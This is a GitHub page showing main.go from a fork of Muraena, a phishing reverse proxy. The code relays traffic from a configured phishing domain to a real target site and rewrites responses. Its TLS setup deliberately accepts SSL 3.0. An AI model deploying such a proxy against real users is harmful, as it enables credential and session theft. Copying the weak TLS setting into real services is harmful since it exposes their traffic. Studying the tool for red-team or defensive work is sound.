forked from muraenateam/muraena
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.go
129 lines (110 loc) · 3.56 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
package main
import (
"crypto/tls"
"crypto/x509"
"fmt"
"net"
"net/http"
"os"
"github.com/muraenateam/muraena/log"
"github.com/muraenateam/muraena/module"
"github.com/muraenateam/muraena/proxy"
"github.com/muraenateam/muraena/session"
"github.com/evilsocket/islazy/tui"
)
type TLSServer struct {
http.Server
Cert string
Key string
CertPool string
}
func (server *TLSServer) ServeTLS(addr string) (err error) {
// In an ideal world everyone would use TLS 1.2 at least, but we downgrade to
// accept SSL 3.0 as a minimum version, otherwise old clients will have issues
conf := &tls.Config{
MinVersion: tls.VersionSSL30,
PreferServerCipherSuites: true,
SessionTicketsDisabled: true,
NextProtos: []string{"http/1.1"},
Certificates: make([]tls.Certificate, 1),
}
conf.Certificates[0], err = tls.X509KeyPair([]byte(server.Cert), []byte(server.Key))
if err != nil {
return err
}
if server.CertPool != "" { // needed only for custom CAs
certpool := x509.NewCertPool()
if !certpool.AppendCertsFromPEM([]byte(server.CertPool)) {
log.Error("Error handling certpool")
}
conf.ClientCAs = certpool
}
conn, err := net.Listen("tcp", addr)
if err != nil {
return err
}
tlsListener := tls.NewListener(conn, conf)
return server.Serve(tlsListener)
}
func main() {
sess, err := session.New()
if err != nil {
fmt.Println(err)
os.Exit(1)
}
if !tui.Effects() {
if *sess.Options.NoColors {
fmt.Printf("\n\nWARNING: Terminal colors have been disabled, view will be very limited.\n\n")
} else {
fmt.Printf("\n\nWARNING: This terminal does not support colors, view will be very limited.\n\n")
}
}
// Initialize the Buffered Logging
log.Init(sess.Config.Proxy.Log.Enabled, sess.Config.Proxy.Log.FilePath, sess.Config.Proxy.Log.BufferedLogDelay)
// Load all modules
module.LoadModules(sess)
// Load replacer rules
var replacer = &proxy.Replacer{
Phishing: sess.Config.Proxy.Phishing,
Target: sess.Config.Proxy.Target,
ExternalOrigin: sess.Config.Crawler.ExternalOrigins,
ExternalOriginPrefix: sess.Config.Crawler.ExternalOriginPrefix,
OriginsMapping: sess.Config.Crawler.OriginsMapping,
TBodyUniversal: sess.Config.Proxy.Transform.Response.Body.Universal,
TBodyCustom: sess.Config.Proxy.Transform.Response.Body.Custom,
}
if err = replacer.DomainMapping(); err != nil {
log.Fatal(err.Error())
}
replacer.MakeReplacements()
//
// Start the reverse proxy
//
http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
s := &proxy.SessionType{Session: sess, Replacer: replacer}
s.HandleFood(w, r)
})
if sess.Config.TLS.Enabled {
lline := fmt.Sprintf("Muraena Reverse Proxy waiting for food on HTTPS...\n[ %s ] ==> [ %s ]",
tui.Yellow(sess.Config.Proxy.Phishing), tui.Green(sess.Config.Proxy.Target))
log.Info(lline)
log.BufLogInfo(lline)
tlsServer := &TLSServer{
Cert: sess.Config.TLS.Certificate,
Key: sess.Config.TLS.Key,
CertPool: sess.Config.TLS.Root,
}
if err := tlsServer.ServeTLS(fmt.Sprintf("%s:443", "0.0.0.0")); err != nil {
log.Fatal("Error binding Muraena on HTTPS: %s", err)
}
} else {
muraena := &http.Server{Addr: fmt.Sprintf("%s:80", "0.0.0.0")}
lline := fmt.Sprintf("Muraena Reverse Proxy waiting for food on HTTP...\n[ %s ] ==> [ %s ]",
tui.Yellow(sess.Config.Proxy.Phishing), tui.Green(sess.Config.Proxy.Target))
log.Info(lline)
log.BufLogInfo(lline)
if err := muraena.ListenAndServe(); err != nil {
log.Fatal("Error binding Muraena on HTTP: %s", err)
}
}
}